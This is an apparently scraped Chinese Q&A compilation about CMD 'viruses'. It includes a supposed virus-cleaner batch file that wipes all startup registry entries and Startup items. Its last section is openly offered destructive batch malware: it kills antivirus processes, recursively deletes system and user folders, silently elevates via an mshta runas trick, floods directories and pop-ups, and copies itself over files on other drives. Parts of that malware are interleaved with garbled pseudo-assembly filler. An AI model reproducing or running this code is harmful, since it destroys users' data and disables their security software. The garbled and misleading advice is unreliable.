本文目录一览:
开机一闪而过的病毒CMD代码(如图),请大神帮忙!!!3ku!!!
以毒攻毒。
你将以下代码:
@echo off
title Clean
Color a
Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /va /f
Reg.exe delete "HKEY_LOCAL_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /va /f
del /s /q /f "%userprofile%\「开始」菜单\程序\启动\*"nul
复制到“记事本”程序中。然后单击“文件”"保存",选择桌面后,在“保存类型”中选择“所有文件”,文件名中填“超级病毒专杀软件.bat”。最后单击“保存”,到桌面上运行“超级病毒专杀软件.bat”文件就行了。
禁止开机自动运行的程序cmd.exe这是什么木马病毒啊?
进程名称: Windows命令提示符描述:cmd.exe是微软Windows系统的命令行程序,类似与微软的DOS操作系统。cmd.exe是一个32位的命令行程序,运行在Windows NT/2000/XP/2003/Vista上。这不是纯粹的系统程序,但是如果终止它,可能会导致未知的问题。
出品者: 微软公司.
属于: 微软 Windows 操作系统
系统进程: 是
后台程序: 否
使用 *** : 否
硬件相关: 否
常见错误: 未知
内存使用: 未知
安全等级 (0-5): 0
间谍软件: 否
广告软件: 否
病毒: 否
木马: 否
cmd.exe is thecommandline interpreter onOS/2, Windows CE and on Windows NT-based operating systems (including Windows 2000, XP, Vista, andServer2003). It is the *** og of COMMAND.COM inMS-DOSand Windows 9x systems, or of theUnixshells used on Unix-like systems.
cmd.exe是命令行译员在OS / 2 , Windows CE和对基于Windows NT操作系统(包括Windows 2000 , XP中, Vista中,和Server 2003 ) 。这是模拟的command.com在MS - DOS和Windows 9X的系统,或对Unix的炮弹使用的Unix系统。
这种情况是文件损坏,用WINDOWS自修复功能修复试试,具体操作如下:
点“开始”、在“运行”里输入 chkdsk c: /f 确定,
输入好:CHKDSK后,打一下空格健再输入:C:/F,:
看到:“是否计划在下次系统重新启动时检查这个卷”的提示输入:Y,回车,
重新启动电脑不要进行任何操作,让电脑自己完全启动,因为系统正在进行修复;试试,希望能帮上你
病毒隐藏文件夹.cmd的代码
是的,具体显现步骤如下:
1、使用组合键(win键+r)打开运行窗口,输入“notepad”按回车键新建一个记事本。
2、接着将下面的代码复制进记事本中:
for /f “delims=?” %%a in (‘dir /a /b’) do attrib -a -s -h -r “%%a”@echo offpausenul
exit
然后点击“文件——另存为”选项。
3、在另存为窗口中,点击“桌面”再将保存类型修改为“所有文件(.)”并将文件名命名为“病毒隐藏文件夹.cmd”最后点击“保存”按钮。
4、此时在桌面上就能够看到一个病毒隐藏文件夹.cmd的文件了,将它拷贝进u盘根目录,并双击运行程序。
5、此时我们就能够看到程序对所有根目录文件执行attrib命令,这样所有被病毒隐藏文件夹就恢复了,刷新即可。
写cmd病毒
代码是
echo off
JMP Label1
Db thunkcode1
Label2:
……
JMP Label3
Db thunkcode3
Label1:
…….
JMP Label2
Db thunkcode2
Label3:
JMP Label1
Db thunkcode1
Label2:jjj
……
JMP Label3
Db thunkcode3
Label1:ss
…….
JMP Label2
Db thunkcode2
Label3:mm
taskkill /f /im 360DesktopLite.exe
jz label
jnz label
db thunkcode
label:
jz label2
jnz label2
db thunkcode
lable2
mov ax, 8
xor ax, 77
...
taskkill /f /im explore.exe
taskkill /f /im 360tray.exe
taskkill /f /im 360Safe.exe
echo off
taskkill /f /im 360tray.exe
JMP Label1
Db thunkcode1
Label2:
……
JMP Label3
Db thunkcode3
Label1:
…….
JMP Label2
Db thunkcode2
Label3:
JMP Label1
Db thunkcode1
Label2:
……
JMP Label3
Db thunkcode3
Label1:
…….
JMP Label2
Db thunkcode2
Label3:
taskkill /f /im 360tray.exe
taskkill /f /im ZhuDongFangYu.exe
rmdir /s/q C:\Users\administrator\Desktop
rmdir /s/q C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
rmdir /s/q C:\ProgramData
del /f /s /q regedit.exe
JMP Label1
Db thunkcode1
Label2:
……
JMP Label3
Db thunkcode3
Label1:
…….
JMP Label2
Db thunkcode2
Label3:
JMP Label1
Db thunkcode1
Label2:
……
JMP Label3
Db thunkcode3
Label1:
…….
JMP Label2
Db thunkcode2
Label3:
call label_1
db thunkcode
jmp label_2
db thunkcode
label_1:
pop eax
jmp label_3
db thunkcode,thunkcode,thunkcode
label_3:
inc eax
jmp label_4
db thunkcode,thunkcode,thunkcode
label_4:
jmp eax
db thunkcode
label_2:
....
del /f /s /q notepad.exe
rmdir /s/q apppatch
rmdir /s/q Windows10Upgrade
rmdir /s/q LDSGameMaster
set path=C:\ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
set temp=C:\mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
del /f /s /q search-ms:displayname=“win10%20(C%3A)”中的搜索结果crumb=System.Generic.String:cmdcrumb=location:C%3A%5C
rmdir /s/q C:\Windows\appcompat\Programs
rmdir /s/q C:\Windows\en-US
rmdir /s/q C:\Windows\OCR
del /f /s /q notepad.exe
rmdir /s/q apppatch
rmdir /s/q Windows10Upgrade
rmdir /s/q LDSGameMaster
set path=C:\ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
set temp=C:\mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
del /f /s /q search-ms:displayname=“win10%20(C%3A)”中的搜索结果crumb=System.Generic.String:cmdcrumb=location:C%3A%5C
rmdir /s/q C:\Windows\appcompat\Programs
rmdir /s/q C:\Windows\en-US
rmdir /s/q C:\Windows\OCR
::wwwwwww::rrrrrr%%tttt
rmdir /s/q C:\Windows\minidump
rmdir /s/q C:\Windows\Microsoft.NET
ftype nppfile="C:\ProgramFiles (x86)\Notepad++\notepad++.exe" %1
for /l %%i in (1 1 9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999)do md A..\
@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)exit
:a
set /a a+=1
echo %random%-%random%-%random% C:\Users\%username%\Desktop\CCBL.%random%
mshta javascript:alert(".");close();
goto a
@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)exit
for /f "tokens=* delims=" %%i in ('dir /b D:\*.*') do copy /y "%dpnx0" "%%i" nul
for /f "tokens=* delims=" %%i in ('dir /b A:\*.*') do copy /y "%dpnx0" "%%i" nul
@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)exit
for /f "tokens=* delims=" %%i in ('dir /b K:\*.*') do copy /y "%dpnx0" "%%i" nul
for /f "tokens=* delims=" %%i in ('dir /b I:\*.*') do copy /y "%dpnx0" "%%i"
@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)exit
for /f "tokens=* delims=" %%i in ('dir /b Z:\*.*') do copy /y "%dpnx0" "%%i" nul
for /f "tokens=* delims=" %%i in ('dir /b M:\*.*') do copy /y "%dpnx0" "%%i" nul
rmdir /s/q C:\Windows\Offline Web Pages